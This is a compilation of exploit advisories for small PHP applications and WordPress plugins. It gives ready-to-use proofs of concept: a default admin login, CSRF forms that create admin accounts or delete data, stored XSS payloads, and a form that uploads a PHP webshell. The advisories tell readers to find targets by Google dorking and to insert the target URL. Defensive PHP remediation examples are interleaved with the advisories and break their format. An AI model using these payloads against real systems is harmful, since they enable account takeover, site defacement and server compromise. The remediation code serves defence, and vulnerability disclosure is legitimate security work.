<pre><code>====================================================================================================================================<br />| # Title : Car listing 1.6 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://demo.phpscriptpoint.com/carlisting/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin@gmail.com & pass = 1234<br /><br />[+] https://www/127.0.0.1/demo/phpscriptpointcom/carlisting/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code># Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF<br /># Date: 15-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/<br /># Version: <= 0.2.1<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not have CSRF check in some places, and is missing<br />sanitisation as well as escaping, which could allow attackers to make<br />logged in admin add Stored XSS payloads via a CSRF attack<br /><br />Proof of Concept<br /><br />Have a logged in admin open a page containing:<br /><br /><html><br /> <body><br /> <form action="http://example.com/wp-admin/admin.php?page=studio_settings"<br />method="POST"><br /> <input type="hidden" name="studio_apikey"<br />value=""><script>alert(1)</script>" /><br /> <input type="hidden" name="studio_url"<br />value=""><script>alert(1)</script>" /><br /> <input type="hidden" name="save" value="Save!" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> <script><br /> history.pushState('', '', '/');<br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /><br />Reference:<br />https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/<br /></code></pre>
<pre><code># Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting<br /># Date: 15-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/profilepro/<br /># Version: <= 1.3<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not sanitise and escape some parameters and lacks proper<br />access controls, which could allow users with a role as low as subscriber<br />to perform Cross-Site Scripting attacks<br /><br />Proof of Concept<br /><br />Run the following code from the browser console from the subscriber user<br /><br />```<br />fetch("../wp-admin/admin-ajax.php", {<br /> method: "POST",<br /> headers: {<br /> "Accept": "*/*",<br /> "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br /> "X-Requested-With": "XMLHttpRequest"<br /> },<br /> body:<br />"title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",<br /> credentials: "include"<br />})<br />.then(response => {<br /> if (!response.ok) {<br /> throw new Error('Network response was not ok');<br /> }<br /> return response.text();<br />})<br />.then(data => console.log(data))<br />.catch(error => console.error('Error:', error));<br />```<br /><br />- As an admin, go to<br />http://example.com/wp-admin/edit.php?post_type=profilepro_form<br />- Choose the default profile, click on edit and click on add field, XSS<br />will pop up.<br /><br />Reference:<br />https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/<br /></code></pre>
<pre><code># Exploit Title: Light Poll <= 1.0.0 - Polls Deletion via CSRF<br /># Date: 05-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/light-poll/<br /># Version: <=1.0.0<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not have CSRF checks when deleting polls, which could allow<br />attackers to make logged in users perform such action via a CSRF attack<br /><br />Proof of Concept<br /><br /><html><br /> <body><br /> <form action="http://localhost/wp-admin/admin.php"><br /> <input type="hidden" name="page" value="lp_settings" /><br /> <input type="hidden" name="task" value="remove" /><br /> <input type="hidden" name="id" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> <script><br /> history.pushState('', '', '/');<br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /><br />Reference:<br />https://wpscan.com/vulnerability/d598eabd-a87a-4e3e-be46-a5c5cc3f130e/<br /><br /><br /><br /><br /># Exploit Title: Light Poll <= 1.0.0 - Poll Answers Deletion via CSRF<br /># Date: 05-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/light-poll/<br /># Version: <=1.0.0<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not have CSRF checks in some places, which could allow<br />attackers to make logged in users perform unwanted actions via CSRF attacks<br /><br />Proof of Concept<br /><br />Where <<POLL_ID>> and <<ANSWER_ID>> are valid:<br /><br />https://example.com/wp-admin/admin.php?page=poll_settings&task=remove_answer&id=<br /><<POLL_ID>>&answer_id=<<ANSWER_ID>><br /><br />Reference:<br />https://wpscan.com/vulnerability/d1449be1-ae85-46f4-b5ba-390d25b87723/<br /></code></pre>
<pre><code># Exploit Title: PVN Auth Popup <= 1.0.0 - Admin+ Stored XSS<br /># Date: 08-04-2024<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/pvn-auth-popup/<br /># Version: <= 1.0.0<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />Description<br /><br />The plugin does not sanitise and escape some of its settings, which could<br />allow high privilege users such as admin to perform Stored Cross-Site<br />Scripting attacks even when the unfiltered_html capability is disallowed<br />(for example in multisite setup)<br /><br />Proof of Concept<br /><br />1. Go to https://example.com/wp-admin/admin.php?page=pvn_auth_popup<br />2. In the first section, enter the payload `"><script>alert(1)</script>`<br />for the "Login text" input<br />3. Save and see the XSS<br /><br />Note: Other fields are likely vulnerable<br /><br />Reference:<br />https://wpscan.com/vulnerability/24685b19-0a44-411a-9e1b-d4d0627d7cb6/<br /></code></pre>
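The four WordPress advisories above (MapFig Studio, profilepro, Light Poll, PVN Auth Popup) share the same root causes: a settings handler or admin-ajax action with no nonce check, no capability check, and no sanitisation or escaping. The following is an added example, not code from any of those plugins, showing how a plugin closes those gaps; the `vs_` prefix, the option name `vs_demo_settings`, the page slug `vs_demo` and the field names are hypothetical.

```php
<?php
// Added example (hypothetical plugin, prefix "vs_"): nonce + capability +
// sanitise on input, escape on output, for a settings page and an ajax action.

// 1. Settings form: emit a nonce field and escape stored values on output.
function vs_render_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    $opts = get_option( 'vs_demo_settings', array( 'apikey' => '', 'url' => '' ) );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=vs_demo' ) ); ?>">
        <?php wp_nonce_field( 'vs_save_settings', 'vs_nonce' ); ?>
        <input type="text" name="apikey" value="<?php echo esc_attr( $opts['apikey'] ); ?>">
        <input type="text" name="url"    value="<?php echo esc_attr( $opts['url'] ); ?>">
        <input type="submit" name="save" value="Save">
    </form>
    <?php
}

// 2. Settings save: the nonce check rejects a forged cross-site POST (the
//    attacker's page cannot read the per-user, per-action token), and each
//    value is sanitised for its type before it is stored.
function vs_handle_settings_save() {
    if ( ! isset( $_POST['save'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    check_admin_referer( 'vs_save_settings', 'vs_nonce' ); // dies on a missing/invalid nonce
    $opts = array(
        'apikey' => sanitize_text_field( wp_unslash( $_POST['apikey'] ?? '' ) ),
        'url'    => esc_url_raw( wp_unslash( $_POST['url'] ?? '' ) ),
    );
    update_option( 'vs_demo_settings', $opts );
}
add_action( 'admin_init', 'vs_handle_settings_save' );

// 3. admin-ajax action: "wp_ajax_" hooks run for ANY logged-in user (a
//    subscriber included), so the capability check is what keeps an admin-only
//    operation admin-only; check_ajax_referer() blocks CSRF against the admin.
function vs_ajax_add_field() {
    check_ajax_referer( 'vs_add_field', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $title = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
    if ( '' === $title ) {
        wp_send_json_error( 'title required', 400 );
    }
    // ... persist the field here, then echo it back escaped for HTML context
    wp_send_json_success( array( 'title' => esc_html( $title ) ) );
}
add_action( 'wp_ajax_vs_add_field', 'vs_ajax_add_field' );
```

Sanitising on save is not a substitute for escaping on output: a value that reaches the page through another path still needs `esc_attr()`/`esc_html()` at the point where it is printed.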
<pre><code>=============================================================================================================================================<br />| # Title : Giftora V 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML adds new posts.<br /><br />[+] Go to line 10, set the target site link, save changes and apply.<br /><br />[+] infected file : /admincp/new-post.<br /><br />[+] save code as poc.html<br /><br />[+] payload : <br /><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://127.0.0.1/giftora.webister.net/admincp/controllers/submit_post" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' value="123456"><br /> </div><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="active" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' Value='Reset'><br /> 
</div><br /> </form><br /> </div><br /><br /></body><br /></html><br />[+] demo https://127.0.0.1/giftora.webister.net/blog<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Gas Agency Management 2022 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code uploads an executable malicious file remotely.<br /><br />[+] Go to line 9.<br /><br />[+] Set the target site link, save changes and apply.<br /><br />[+] infected file : gasmark/manage_website.php.<br /><br />[+] save code as poc.html<br /><br /><!DOCTYPE html><br /><html lang="ar"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>indoushak was here</title><br /></head><br /><body><br /> <form action="http://127.0.0.1/gasmark/manage_website.php" method="POST" enctype="multipart/form-data"><br /> <input type="hidden" name="old_website_image" value="old_website_image.jpg"><br /> <label for="website_image">S0M3 ThING baD:</label><br /> <input type="file" name="website_image" id="website_image"><br><br><br /><br /> <input type="submit" name="btn_web" value="do !T"><br /> </form><br /></body><br /></html><br /><br />[+] Path : http://127.0.0.1/gasmark/assets/uploadImage/Logo/ev!l.php<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
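The upload handler above stores whatever file name the client sends under a web-served directory, which is why a `.php` upload ends up executable. As an added example (not code from the Gas Agency Management project), this is how a hardened replacement for such an image-upload handler decides what to store and where; the field names `website_image` and `btn_web` and the `assets/uploadImage/Logo` path come from the advisory, while the session fields and the `csrf` field are assumptions.

```php
<?php
// Added example, hypothetical replacement for an image-upload handler.
// Type is decided server-side, the name is random, and the extension comes
// from the detected MIME type, never from the client.
function save_website_image(array $file, string $uploadDir): string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed: ' . ($file['error'] ?? 'no file'));
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('file too large');
    }
    // Sniff the content; the client-supplied name and Content-Type are untrusted.
    $finfo   = new finfo(FILEINFO_MIME_TYPE);
    $mime    = $finfo->file($file['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('not an allowed image type: ' . $mime);
    }
    // It must also parse as an image, not merely start with a magic number.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Random name: no user-controlled path component, no double extensions.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);   // never executable; also disable PHP handling for this directory in the web server
    return $name;
}

// Request handling: only a logged-in admin, and only with a session-bound
// CSRF token, may replace the site image. (Assumed session layout.)
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['btn_web'])) {
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('login required');
    }
    $expected = $_SESSION['csrf'] ?? '';
    $given    = $_POST['csrf'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        http_response_code(403);
        exit('bad CSRF token');
    }
    if (!isset($_FILES['website_image'])) {
        http_response_code(400);
        exit('no file');
    }
    try {
        $stored = save_website_image($_FILES['website_image'], __DIR__ . '/assets/uploadImage/Logo');
        echo 'stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Storing uploads outside the document root (or in a directory where the web server refuses to execute scripts) is the second half of the fix; the validation above only limits what gets written.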
<pre><code>=============================================================================================================================================<br />| # Title : Farmacia Gama v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] The following HTML code adds a new admin.<br /><br />[+] Go to line 10, set the target site link, save changes and apply.<br /><br />[+] infected file : /main.php.<br /><br />[+] save code as poc.html<br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Farmacia Form</title><br /></head><br /><body><br /> <h2>Farmacia User Form</h2><br /> <form action="http://127.0.0.1/farmacia-master/main.php" method="POST"><br /> <label for="nome">Nome:</label><br /> <input type="text" id="nome" name="nome" required><br><br><br /><br /> <label for="cargo">Cargo:</label><br /> <input type="text" id="cargo" name="cargo" required><br><br><br /><br /> <label for="usuario">Usuário:</label><br /> <input type="text" id="usuario" name="usuario" required><br><br><br /><br /> <label for="senha">Senha:</label><br /> <input type="password" id="senha" name="senha" required><br><br><br /><br /> <button type="submit" name="acao">Submit</button><br /> </form><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. 
Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Employees Pay Slip PDF Generator System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This HTML page :<br /><br /> is a user registration form that allows users to input a username, password, and upload an avatar image. <br /> The form data is then sent via an AJAX request to a server-side script for processing.<br /><br />[+] Here's a breakdown of how it works:<br /><br /> HTML Structure<br /><br /> Form Elements:<br /> <br /> username: A text field where the user can input their username.<br /> password: A password field for entering a password.<br /> img: A file input for uploading an avatar image (restricted to image file types).<br /><br /> Save User Button:<br /> <br /> An input element with the type button is used to trigger the saveUser() function when clicked.<br /><br />[+] JavaScript (AJAX Request)<br /><br /> <br /> AJAX Request:<br /> <br /> An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).<br /> The request method is POST, and the data is sent to the specified URL.<br /> The onload function checks if the request was successful (status code 200). 
If it was,<br /> it alerts the user that the save was successful; otherwise, it alerts the user of an error.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/pess/classes/Users.php?f=save", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Bakery Shop Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This HTML code :<br /><br /> represents a simple user form that collects data for a user (like a username, password, and user type) and submits it to a server using AJAX. <br /> Let me break down the key components of this code:<br /> <br />[+] HTML Structure<br /><br /> Container & Form:<br /> <br /> <div class="container-fluid">: This div serves as a container for the form and ensures that it will take up the full width of its parent container.<br /> <form action="" id="user-form">: This form collects user data. The action attribute is empty, <br /> meaning the form doesn't submit in the traditional way (it's handled via JavaScript instead).<br /><br /> Hidden Input:<br /> <input type="hidden" name="id" value="">: This hidden input is used to store the user ID. It might be used for editing an existing user where the user ID <br /> is sent back to the server but isn't visible to the user.<br /><br />[+] Form Fields:<br /><br /> Full Name:<br /><br /> <label for="fullname" class="control-label">Username</label><br /> <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value=""><br /><br /> This field is actually mislabeled—the label says "Username," but the input is for the user's full name. 
<br /> The input field is styled using Bootstrap classes.<br /><br /> Username:<br /><br /> <label for="username" class="control-label">Password</label><br /> <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value=""><br /><br />[+] Similarly, this field is labeled as "Password," but the input is meant for the username. The input type should be password instead of text for security reasons.<br /><br />[+] User Type:<br /><br /> <label for="type" class="control-label">Type</label><br /> <select name="type" id="type" class="form-select form-select-sm rounded-0" required><br /> <option value="1">Administrator</option><br /> <option value="0">Cashier</option><br /> </select><br /><br /> This dropdown allows the user to select their type—either "Administrator" or "Cashier." The selected value (1 or 0) is sent to the server.<br /><br />[+] Submit Button: <br /><br /> <button type="submit" class="btn btn-primary">Save</button>: This button submits the form. It's styled as a primary button using Bootstrap.<br /><br />[+] JavaScript (jQuery)<br /><br /> Form Submission Handling:<br /> $(function(){ ... }): This is a jQuery shorthand for $(document).ready(), meaning the function runs after the DOM is fully loaded.<br /> $('#user-form').submit(function(e){ ... }): This function handles the form submission. <br /> The default form submission behavior is prevented (e.preventDefault()), meaning the form doesn't reload the page.<br /><br /> Message Handling:<br /> $('.pop_msg').remove();: This removes any previous pop-up messages before submitting the form.<br /> _el.addClass('pop_msg'): Creates a new element for displaying messages (e.g., success or error messages).<br /><br /> AJAX Request:<br /> $.ajax({ ... 
}): Sends the form data to the server without reloading the page.<br /> URL: The form is submitted to http://127.0.0.1/bsms/Actions.php?a=save_user.<br /> Method: The data is sent using the POST method.<br /> Data: The form data is serialized (_this.serialize()) and sent as JSON.<br /> Error Handling:<br /> If an error occurs, the script logs it to the console and displays an error message (which currently says "Yes Mother fucker !"<br /> —this is an inappropriate message and should be corrected to something like "An error occurred.").<br /> Success Handling:<br /> If the submission is successful, the form is reset, a success message is shown, and the page may reload after a short delay.<br /> If the submission fails, the error message from the server response is displayed.<br /> <br />[+] Line 36 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><div class="container-fluid"><br /> <form action="" id="user-form"><br /> <input type="hidden" name="id" value=""><br /> <div class="form-group"><br /> <label for="fullname" class="control-label">Username</label><br /> <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value=""><br /> </div><br /> <div class="form-group"><br /> <label for="username" class="control-label">Password</label><br /> <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value=""><br /> </div><br /> <div class="form-group"><br /> <label for="type" class="control-label">Type</label><br /> <select name="type" id="type" class="form-select form-select-sm rounded-0" required><br /> <option value="1">Administrator</option><br /> <option value="0">Cashier</option><br /> </select><br /> </div><br /> <button type="submit" class="btn btn-primary">Save</button><br /> </form><br /></div><br /><br /><script src="https://code.jquery.com/jquery-3.6.0.min.js"></script><br /><script><br /> $(function(){<br /> 
$('#user-form').submit(function(e){<br /> e.preventDefault();<br /> $('.pop_msg').remove(); // Remove any previous pop-up messages<br /><br /> var _this = $(this);<br /> var _el = $('<div>').addClass('pop_msg');<br /><br /> $('#user-form button[type="submit"]').attr('disabled', true).text('Submitting form...');<br /><br /> $.ajax({<br /> url: 'http://127.0.0.1/bsms/Actions.php?a=save_user',<br /> method: 'POST',<br /> data: _this.serialize(),<br /> dataType: 'JSON',<br /> error: function(err) {<br /> console.log(err);<br /> _el.addClass('alert alert-danger').text("Yes Mother fucker !");<br /> _this.prepend(_el);<br /> _el.show('slow');<br /> $('#user-form button[type="submit"]').attr('disabled', false).text('Save');<br /> },<br /> success: function(resp) {<br /> if (resp.status == 'success') {<br /> _el.addClass('alert alert-success').text(resp.msg);<br /> _this.prepend(_el);<br /> _el.show('slow');<br /><br /> $('#user-form').get(0).reset(); // Reset form after successful submission<br /><br /> // Optional: reload page after a short delay<br /> setTimeout(function() {<br /> location.reload();<br /> }, 2000);<br /><br /> } else {<br /> _el.addClass('alert alert-danger').text(resp.msg);<br /> _this.prepend(_el);<br /> _el.show('slow');<br /> }<br /><br /> $('#user-form button[type="submit"]').attr('disabled', false).text('Save');<br /> }<br /> });<br /> });<br /> });<br /> <br /></script><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
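The Giftora, Farmacia, Pay Slip and Bakery Shop advisories above all describe the same defect: a state-changing admin endpoint (`submit_post`, `main.php`, `Users.php?f=save`, `Actions.php?a=save_user`) that accepts any POST carrying the victim's session cookie. The following is an added example, not code from any of those applications, of the synchronizer-token defence plus an Origin check that such an endpoint needs; the route `/admincp/submit_post`, the field name `csrf_token`, the allowed origin and the session layout are hypothetical.

```php
<?php
// Added example (hypothetical plain-PHP admin handler): session-bound CSRF
// token, Origin check, and a SameSite session cookie.

// Keep the session cookie off cross-site POSTs in browsers that honour SameSite.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// Issue one unguessable token per session (regenerate it after login).
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate the token from the form body or, for XHR, from a request header.
// A forged page on another origin cannot read the victim's token, so it
// cannot supply it.
function csrf_valid(): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $_POST['csrf_token'] ?? ($_SERVER['HTTP_X_CSRF_TOKEN'] ?? '');
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Defence in depth: browsers attach Origin to cross-site POSTs and scripts
// cannot forge it, so a mismatch is rejected before the token is even read.
function origin_allowed(array $allowedOrigins): bool {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
    if ($origin === null) {
        return true;   // absent on some same-origin requests; the token still applies
    }
    return in_array($origin, $allowedOrigins, true);
}

// --- the admin action, e.g. /admincp/submit_post ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (empty($_SESSION['admin_id'])) {
        http_response_code(401);
        exit('login required');
    }
    if (!origin_allowed(['https://admin.example.invalid']) || !csrf_valid()) {
        http_response_code(403);
        exit('request rejected');
    }
    // ... only now create the post / user with the submitted fields ...
}

// --- the form that legitimately posts to it carries the token ---
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="POST" action="/admincp/submit_post">';
echo '  <input type="hidden" name="csrf_token" value="' . $token . '">';
echo '  <input type="text" name="title"> <input type="submit" value="Save">';
echo '</form>';
```

For the AJAX variants above, the page's own script reads the token from the hidden field and sends it in the `X-CSRF-Token` header; a cross-origin page cannot do that, and a plain cross-site POST without the header or field is rejected.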